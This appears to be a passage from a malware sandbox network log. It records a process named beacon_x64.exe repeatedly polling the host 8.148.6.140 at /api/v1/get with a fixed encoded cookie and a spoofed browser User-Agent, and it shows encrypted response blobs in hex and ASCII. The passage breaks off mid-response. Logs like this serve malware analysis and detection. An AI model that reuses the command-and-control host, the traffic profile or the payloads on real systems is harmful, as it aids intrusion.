          Data Ascii: HlSGoJQmaP57ptmaBFTF1NZLPAfEpfMQBHHCHP+EjIV4q4vnQVb7+ZjUxXIFIKPkqerD6YZSIi116q6tXktgn25gbsqIokJbsqN920I8QuI=


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          28192.168.2.6500128.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:25:55.060357094 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          29192.168.2.6500138.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:25:59.174638987 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:26:00.145867109 CET185INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:25:59 GMT
          Server: nginx
          Content-Length: 344
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Jan 10, 2025 09:26:00.145940065 CET344INData Raw: 52 52 37 36 57 4d 55 2b 6f 53 61 6e 46 30 2f 47 75 2b 52 63 41 46 45 69 37 4a 45 68 79 45 48 4f 6a 43 59 4f 4b 4b 42 51 46 44 47 54 76 6b 67 49 4b 77 62 39 49 47 72 35 2f 7a 34 4f 43 46 6b 75 78 31 54 52 4c 51 56 2f 69 30 4a 72 44 68 46 66 36 35
          Data Ascii: RR76WMU+oSanF0/Gu+RcAFEi7JEhyEHOjCYOKKBQFDGTvkgIKwb9IGr5/z4OCFkux1TRLQV/i0JrDhFf65xf1fEdU9B73oEVU6U0AcE+tJFpHtshPoHxM7Xhb5zWOhCYsaz8j+AVQMNfgEadF1G624IR5l4jr37n8S6EzofdZz7tjs6YEqvXMOAHy3EEo4IN/Ooh4Wqs4YRZrbGQ2CBbEhkTT5xH10Mzi1GW/5T+WkRrrCRXgX3


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          30192.168.2.6500148.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:26:00.263515949 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:26:01.230549097 CET377INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:26:01 GMT
          Server: nginx
          Content-Length: 192
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 59 70 2b 68 57 54 63 7a 2f 69 32 2f 6c 6a 6a 61 45 35 46 78 69 7a 55 45 74 55 77 42 6a 54 67 75 75 68 33 4d 2f 63 43 31 33 32 61 74 45 6b 57 73 33 59 2b 79 50 6f 6d 57 38 74 2b 41 79 4c 61 43 6f 71 4a 47 72 54 51 77 6d 4b 6e 75 4e 4b 4d 6c 50 61 59 68 5a 77 56 65 31 69 43 68 79 48 42 61 66 57 79 75 56 34 58 43 31 64 4e 32 65 68 4c 31 6d 32 75 30 66 68 36 53 38 70 45 73 63 41 38 62 55 4f 66 77 35 4e 50 7a 33 36 56 76 49 34 39 32 79 6c 41 74 45 75 49 4d 57 51 4e 33 6f 6b 56 4f 31 79 38 6a 4c 55 74 79 6e 75 51 39 4d 7a 4c 6b 4a 35 76 38 50 6c 50 39 44 74 33 51 69 4c 62 65
          Data Ascii: Yp+hWTcz/i2/ljjaE5FxizUEtUwBjTguuh3M/cC132atEkWs3Y+yPomW8t+AyLaCoqJGrTQwmKnuNKMlPaYhZwVe1iChyHBafWyuV4XC1dN2ehL1m2u0fh6S8pEscA8bUOfw5NPz36VvI492ylAtEuIMWQN3okVO1y8jLUtynuQ9MzLkJ5v8PlP9Dt3QiLbe


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          31192.168.2.6500168.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:26:01.429548025 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:26:02.395895004 CET441INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:26:02 GMT
          Server: nginx
          Content-Length: 256
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 2f 52 62 71 4b 35 6f 73 6e 38 72 53 2b 42 31 77 5a 4b 63 51 6e 71 62 6c 7a 48 35 61 73 51 6e 4e 4e 37 36 6b 6e 72 75 51 30 56 77 44 59 78 61 70 45 6e 49 65 55 73 63 55 63 63 65 49 4c 6e 38 64 6d 54 6a 74 4f 4b 67 49 69 75 67 4f 64 6a 55 44 39 76 6d 4b 76 41 37 79 50 53 68 32 37 2f 65 66 61 62 43 4f 51 68 62 54 70 74 61 67 64 68 53 44 32 63 51 52 78 6c 38 6a 55 39 2b 77 39 63 49 52 45 64 4d 76 36 70 68 69 57 4b 4e 58 48 47 6c 6c 50 63 64 36 77 4f 48 7a 6a 6b 66 66 30 49 48 51 36 38 71 42 79 55 49 75 42 41 6b 74 52 79 58 48 71 46 7a 6d 4e 31 45 69 66 66 63 4e 51 61 4e 34 4d 48 74 78 78 52 68 71 41 4f 74 2b 58 74 6e 4b 67 67 53 56 46 44 68 2f 58 38 79 51 30 41 64 6a 65 6d 41 72 51 64 33 6b 32 45 38 34 37 79 57 4f 65 34 6e 79 62 59 48 6e 4f 30 65 67 78 32 4c 34
          Data Ascii: /RbqK5osn8rS+B1wZKcQnqblzH5asQnNN76knruQ0VwDYxapEnIeUscUcceILn8dmTjtOKgIiugOdjUD9vmKvA7yPSh27/efabCOQhbTptagdhSD2cQRxl8jU9+w9cIREdMv6phiWKNXHGllPcd6wOHzjkff0IHQ68qByUIuBAktRyXHqFzmN1EiffcNQaN4MHtxxRhqAOt+XtnKggSVFDh/X8yQ0AdjemArQd3k2E847yWOe4nybYHnO0egx2L4


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          32192.168.2.6500178.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:26:02.544296026 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:26:04.144680023 CET569INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:26:03 GMT
          Server: nginx
          Content-Length: 384
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 31 30 58 72 38 78 71 39 4b 67 71 70 5a 62 47 72 35 48 61 45 2b 56 75 46 65 54 76 74 4d 4c 4f 4c 6b 46 63 53 54 70 41 32 50 53 74 71 6e 30 52 74 58 6c 53 4e 79 2f 50 56 75 31 67 7a 4f 43 45 39 59 6d 6c 53 2b 57 4a 4c 6f 43 48 64 6b 59 51 38 54 37 31 79 48 38 31 37 2b 4c 37 59 6f 6a 49 67 45 75 35 6c 70 63 77 75 73 54 72 4c 48 64 6a 71 2f 4a 2b 79 48 51 55 38 6f 43 38 52 58 41 46 48 7a 79 30 62 64 4f 57 2b 55 61 4b 66 73 38 70 46 6f 6b 67 35 73 77 68 68 7a 4f 38 41 44 4f 54 37 5a 38 54 53 79 50 65 4e 74 66 4e 70 72 43 73 6a 58 41 2f 6b 71 6f 38 4a 54 71 4c 48 6e 55 4c 33 77 49 37 50 61 42 48 76 67 72 61 55 4a 2b 64 72 5a 6f 55 78 50 6a 32 59 6d 58 38 6f 73 63 41 4f 4c 61 4f 43 6a 41 4a 39 4a 5a 71 6f 76 52 4d 48 50 30 6d 46 35 47 4c 4c 68 4c 73 64 58 74 32 2f 42 68 70 75 4b 56 41 51 37 6e 6c 7a 48 62 32 68 57 30 6e 43 79 79 79 54 6f 57 6b 2b 55 6f 59 4c 52 4f 65 2b 2b 77 62 61 6c 6b 36 38 38 58 4d 34 6d 58 49 75 51 35 34 54 4d 61 34 4c 58 4b 56 37 34 6d 4a 61 78 32 71 52 47 38 66 42 56 50 4c 73 68 78 [TRUNCATED]
          Data Ascii: 10Xr8xq9KgqpZbGr5HaE+VuFeTvtMLOLkFcSTpA2PStqn0RtXlSNy/PVu1gzOCE9YmlS+WJLoCHdkYQ8T71yH817+L7YojIgEu5lpcwusTrLHdjq/J+yHQU8oC8RXAFHzy0bdOW+UaKfs8pFokg5swhhzO8ADOT7Z8TSyPeNtfNprCsjXA/kqo8JTqLHnUL3wI7PaBHvgraUJ+drZoUxPj2YmX8oscAOLaOCjAJ9JZqovRMHP0mF5GLLhLsdXt2/BhpuKVAQ7nlzHb2hW0nCyyyToWk+UoYLROe++wbalk688XM4mXIuQ54TMa4LXKV74mJax2qRG8fBVPLshxkuHBv16qHGR2HXeoFTfC9PBpEet9FAnefZh1UfSPkUc1c0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          33192.168.2.6500188.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:26:04.263178110 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          34192.168.2.6500198.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:26:08.516064882 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:26:12.483911037 CET549INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:26:12 GMT
          Server: nginx
          Content-Length: 364
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 73 56 41 45 48 45 75 34 70 65 6c 42 42 64 64 4e 54 37 6a 63 56 62 70 74 72 59 43 4d 42 47 51 64 45 77 4d 6e 45 75 65 59 2b 4c 6b 6a 58 61 57 43 53 43 65 79 4d 2f 77 46 71 49 38 7a 36 45 53 7a 31 41 74 6c 54 56 2b 38 35 6d 71 64 59 6d 31 4a 75 39 2b 76 66 66 5a 75 6e 30 65 74 78 68 34 47 61 4b 35 61 55 4b 75 2f 6a 51 73 39 45 39 32 63 43 64 4f 39 43 51 64 57 4e 30 42 4c 58 61 77 50 62 52 30 7a 39 57 58 48 41 58 67 56 4a 45 42 72 39 34 56 6e 35 74 2f 35 61 57 44 67 54 66 6b 4e 6f 66 69 33 36 4b 2f 62 50 55 70 76 49 74 5a 37 43 46 47 48 64 4a 39 68 2f 6a 51 63 56 55 41 69 30 70 43 6e 49 33 64 65 42 4a 77 76 55 33 30 2b 58 6e 72 30 52 69 69 77 49 61 59 64 75 77 51 39 65 35 38 68 73 70 63 57 4e 79 2b 72 6e 64 54 44 4e 31 59 38 71 55 74 35 61 46 34 74 50 38 31 38 75 6c 32 55 49 5a 65 46 47 67 33 72 63 33 35 51 51 71 66 78 2f 46 39 75 42 36 4a 41 78 53 52 2f 5a 35 64 65 2b 4e 36 66 4f 6e 4e 31 73 61 38 75 4a 73 53 75 4c 51 4f 59 77 52 64 64 76 30 51 4f 41 71 37 75 47 34 31 68 4e 55 49 41 6c 54 63 57 2b 36 [TRUNCATED]
          Data Ascii: sVAEHEu4pelBBddNT7jcVbptrYCMBGQdEwMnEueY+LkjXaWCSCeyM/wFqI8z6ESz1AtlTV+85mqdYm1Ju9+vffZun0etxh4GaK5aUKu/jQs9E92cCdO9CQdWN0BLXawPbR0z9WXHAXgVJEBr94Vn5t/5aWDgTfkNofi36K/bPUpvItZ7CFGHdJ9h/jQcVUAi0pCnI3deBJwvU30+Xnr0RiiwIaYduwQ9e58hspcWNy+rndTDN1Y8qUt5aF4tP818ul2UIZeFGg3rc35QQqfx/F9uB6JAxSR/Z5de+N6fOnN1sa8uJsSuLQOYwRddv0QOAq7uG41hNUIAlTcW+6iRyEX6W2j/uCOCo0CqcEmnw+M=


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          35192.168.2.6500208.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:26:12.592144012 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:26:13.553263903 CET337INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:26:13 GMT
          Server: nginx
          Content-Length: 152
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 6a 53 42 63 51 52 6c 43 56 6d 73 67 4c 4b 32 55 5a 66 71 37 79 30 54 71 68 65 68 78 46 76 43 51 62 38 5a 64 57 64 31 4c 6c 6c 6c 39 57 58 56 47 63 54 65 55 67 55 30 5a 30 73 31 79 65 56 67 73 5a 74 66 56 49 78 6b 6a 42 45 73 2b 47 31 71 31 63 43 47 62 64 6b 56 6a 7a 73 52 79 42 68 71 4c 47 68 6d 46 37 6f 73 44 63 38 34 62 33 59 36 53 53 39 70 4a 37 69 66 72 57 36 43 6f 79 41 41 56 42 4c 75 62 31 62 43 35 48 39 47 79 55 30 4c 4d 68 78 76 6d 36 41 3d 3d
          Data Ascii: jSBcQRlCVmsgLK2UZfq7y0TqhehxFvCQb8ZdWd1Llll9WXVGcTeUgU0Z0s1yeVgsZtfVIxkjBEs+G1q1cCGbdkVjzsRyBhqLGhmF7osDc84b3Y6SS9pJ7ifrW6CoyAAVBLub1bC5H9GyU0LMhxvm6A==


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          36192.168.2.6500228.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:26:13.669687033 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:26:14.632354975 CET293INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:26:14 GMT
          Server: nginx
          Content-Length: 108
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 39 6d 4b 2f 72 2b 6b 62 4b 53 31 50 64 51 67 33 34 33 6c 51 7a 63 47 61 4e 6f 48 66 5a 66 70 56 69 53 73 37 49 6b 4f 30 39 6d 67 4f 48 62 4c 36 61 76 54 59 73 2b 54 65 44 66 49 55 79 6d 39 6c 33 56 43 38 37 39 4b 62 39 66 57 48 56 38 38 68 78 47 57 4b 43 42 44 77 35 34 6d 2f 69 32 46 71 67 47 33 6c 61 4b 72 44 56 53 59 3d
          Data Ascii: 9mK/r+kbKS1PdQg343lQzcGaNoHfZfpViSs7IkO09mgOHbL6avTYs+TeDfIUym9l3VC879Kb9fWHV88hxGWKCBDw54m/i2FqgG3laKrDVSY=


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          37192.168.2.6500238.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:26:14.750066042 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:26:15.712852001 CET185INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:26:15 GMT
          Server: nginx
          Content-Length: 364
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Jan 10, 2025 09:26:15.712863922 CET364INData Raw: 61 34 76 4a 58 35 4a 78 50 43 38 38 6c 54 42 64 7a 6a 45 2f 35 41 74 31 43 32 58 39 35 36 34 6a 53 78 5a 2f 39 4c 64 54 57 62 48 58 30 6a 77 57 6e 4d 32 71 44 47 49 69 6e 48 37 55 77 68 74 4c 76 44 4b 33 2f 67 66 48 71 4f 64 43 72 6e 61 57 74 69
          Data Ascii: a4vJX5JxPC88lTBdzjE/5At1C2X9564jSxZ/9LdTWbHX0jwWnM2qDGIinH7UwhtLvDK3/gfHqOdCrnaWtiBLlsLCFBSVWSo2JYhRVS2zC7X4yu2S2ojokp0WkJC9pAQGT4oTU06lyjP1UP0q/HzZR9XVLSfM5wiiOgroLPk9BSem5r/Ggg+Hhuo2M/GS3oc83nfetKmi/jPM0CBpirSAhoAYlmQhXAeNmT3d907qXb0ZP1fzEiy


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          38192.168.2.6500248.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:26:15.841090918 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:26:16.835022926 CET185INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:26:16 GMT
          Server: nginx
          Content-Length: 108
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Jan 10, 2025 09:26:16.835037947 CET108INData Raw: 38 34 2f 31 68 35 71 6c 49 36 55 62 75 65 71 4f 39 7a 76 68 4e 56 44 32 4e 53 75 76 4b 64 63 52 51 51 51 70 75 47 70 72 70 42 74 4c 48 35 6d 63 6a 2b 4c 74 47 45 70 54 61 76 4d 55 46 58 48 66 45 4e 48 4c 31 73 38 6e 66 77 4a 57 44 66 38 37 42 2b
          Data Ascii: 84/1h5qlI6UbueqO9zvhNVD2NSuvKdcRQQQpuGprpBtLH5mcj+LtGEpTavMUFXHfENHL1s8nfwJWDf87B+P30UsMjwWDH5RGu4vQpW7MnFI=


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          39192.168.2.6500258.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:26:16.975497961 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:26:17.947873116 CET401INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:26:17 GMT
          Server: nginx
          Content-Length: 216
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 38 33 73 52 62 67 65 43 77 66 50 72 55 43 63 61 7a 63 32 76 4a 36 63 2b 76 7a 72 64 30 70 39 66 2b 74 4b 6d 51 59 79 69 49 35 58 6e 50 2b 38 2f 72 38 46 79 49 72 71 57 64 79 4f 64 34 42 71 49 2b 6f 47 49 57 6d 47 31 34 30 6b 70 52 74 6a 63 57 7a 4c 2b 32 34 50 55 2f 5a 2b 43 70 56 70 48 30 47 77 39 6f 36 47 62 7a 59 66 39 45 45 45 68 56 78 6a 79 71 7a 47 57 71 38 66 51 6d 4d 6f 52 54 38 39 6c 30 65 4a 74 4b 32 6b 69 51 6c 61 36 79 43 41 6f 4f 33 68 38 6c 58 4c 33 4a 4b 62 57 58 4a 6d 50 57 59 2b 31 34 55 31 49 65 42 49 41 4a 74 5a 50 6c 57 70 70 62 36 30 48 57 58 72 43 6e 52 32 4d 30 46 34 33 5a 54 51 37 31 6d 37 67 67 6b 46 41 37 77 3d 3d
          Data Ascii: 83sRbgeCwfPrUCcazc2vJ6c+vzrd0p9f+tKmQYyiI5XnP+8/r8FyIrqWdyOd4BqI+oGIWmG140kpRtjcWzL+24PU/Z+CpVpH0Gw9o6GbzYf9EEEhVxjyqzGWq8fQmMoRT89l0eJtK2kiQla6yCAoO3h8lXL3JKbWXJmPWY+14U1IeBIAJtZPlWppb60HWXrCnR2M0F43ZTQ71m7ggkFA7w==


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          40192.168.2.6500268.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:26:18.060146093 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:26:19.008219957 CET185INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:26:18 GMT
          Server: nginx
          Content-Length: 236
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Jan 10, 2025 09:26:19.008289099 CET236INData Raw: 31 74 4d 55 6f 56 49 30 68 64 30 6e 4b 46 2f 73 71 72 61 38 55 74 57 30 6e 49 55 32 51 54 48 30 72 4d 34 73 43 2b 4c 6b 33 42 4f 31 73 68 70 46 30 30 71 2f 68 42 59 61 66 6f 33 44 69 47 42 78 7a 42 66 6b 50 66 72 67 79 4a 68 64 4f 6a 53 4d 48 48
